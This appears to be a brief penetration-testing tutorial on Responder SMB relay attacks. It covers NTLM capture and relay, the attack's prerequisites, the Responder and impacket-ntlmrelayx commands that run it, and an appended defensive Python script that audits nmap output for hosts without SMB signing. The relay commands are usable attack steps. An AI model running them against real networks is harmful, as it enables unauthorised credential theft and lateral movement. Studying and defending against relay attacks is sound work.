Responder SMB Relay

Responder SMB Relay is an attack technique where Responder tricks devices into sending NTLM credentials, then relays those credentials via SMB to gain unauthorized access to another system—without needing to crack passwords. This type of attack is effective because Windows systems often trust NTLM authentication requests, and if a server has SMB signing disabled or misconfigured, the attacker can impersonate the victim seamlessly. In practice, this can allow lateral movement across a network, giving the attacker access to files, services, or even full administrative control depending on the privileges of the captured credentials.

The danger of Responder SMB Relay lies in its ability to exploit weaknesses in authentication protocols rather than brute-forcing or cracking passwords. Since NTLM authentication is widely used for compatibility reasons, many environments remain vulnerable if protections such as SMB signing, Extended Protection for Authentication, or disabling legacy name resolution protocols like LLMNR and NetBIOS are not enforced. By relaying credentials instead of attempting to break their encryption, attackers can move quickly and stealthily, often bypassing traditional security monitoring. This makes it critical for organizations to harden their networks against relay attacks and adopt modern authentication standards.

Requirements:

SMB signing must be disabled on the target.

The relayed user's credentials must have administrator rights on the target machine.

SMB Relay Commands

<!--Turn off the SMB and HTTP servers in Responder.conf (set SMB = Off and HTTP = Off)-->
sudo nano /usr/share/responder/Responder.conf

<!--Start Responder-->
sudo responder -I eth0 -wd

<!--Install impacket-scripts-->
sudo apt install impacket-scripts

<!--Impacket Info-->
impacket-DumpNTLMInfo -h

<!--Set up ntlmrelayx-->
sudo impacket-ntlmrelayx -tf targets.txt -smb2support

<!--Check if SMB signing is required-->
nmap --script=smb2-security-mode.nse -p 445 <target_ip>

In progress
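
For defenders auditing the SMB signing requirement listed above, the following added example (not part of the original post) parses the normal output of the `smb2-security-mode` nmap check and lists hosts that do not require signing, so they can be remediated. The sample output, host names and function names are constructed for illustration.

```python
import re

# Constructed sample of normal output from the nmap command above (not real hosts).
SAMPLE = """\
Nmap scan report for fs01.corp.example (192.0.2.10)
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Nmap scan report for 192.0.2.23
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for 192.0.2.40
PORT    STATE  SERVICE
445/tcp closed microsoft-ds
"""

HOST_RE = re.compile(r"^Nmap scan report for (.+)$")
SIGNING_RE = re.compile(r"Message signing (.+)$")

def audit_smb_signing(nmap_output):
    """Return {host: 'required' | 'not-required' | 'no-result'}."""
    results, host = {}, None
    for line in nmap_output.splitlines():
        m = HOST_RE.match(line.strip())
        if m:
            host = m.group(1)
            results[host] = "no-result"  # port closed or no SMB2 answer
            continue
        m = SIGNING_RE.search(line)
        if m and host:
            state = m.group(1).strip().rstrip("!")
            # Only "enabled and required" means signing is enforced.
            if state != "enabled and required":
                results[host] = "not-required"
            elif results[host] != "not-required":
                results[host] = "required"
    return results

def hosts_needing_fix(nmap_output):
    """Hosts where SMB signing should be enforced."""
    return sorted(h for h, s in audit_smb_signing(nmap_output).items() if s == "not-required")
```

Hosts reported as `no-result` had no script output and need a separate check before they are counted as safe.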